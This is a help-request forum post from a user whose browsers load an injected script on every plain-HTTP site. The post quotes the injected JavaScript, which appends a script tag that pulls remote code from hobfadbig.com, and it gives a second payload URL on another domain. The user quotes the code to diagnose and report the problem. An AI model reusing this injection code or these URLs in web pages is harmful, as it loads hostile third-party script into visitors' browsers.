# Clickjacked every non secure site (http) by hobfadbig.com

Tags: google-chrome, http, firefox, browser, https

My all browser click-jacked by some kind of method not sure how,

By spending huge time some how figured out who is doing this,
Domain named **hobfadbig.com** is injecting below script in `jquery-1.4.2.min.js` file in every non **https** site. Secure site working fine as it is, but this attack works on non secure **http** web sites

```js
document.addEventListener(
  'DOMContentLoaded',
  function () {
    var esp = document.createElement('span');
    var esr = document.createElement('script');
    esr.src = 'http://hobfadbig.com/ryjlRQHB8rfBdYEZN/6922?ndn=m2';
    esr.type = 'text/javascript';
    esp.appendChild(esr);
    document.body.appendChild(esp);
  },
  false
);
```

I have tried this thing already.

1. cleared cookies
2. Uninstalled browser and installed it again
3. Even changed operating system
4. Linux, Windows both OS having same issue

Still some how attacks successful.[image]

Update: another source this type of attack: http://tareinlettartar.com/rgGUtPyNvlNBEQld3/6932?aDcPgiD=1&aDgRpiD=93&tAgaDiD=296&nsVnM=m2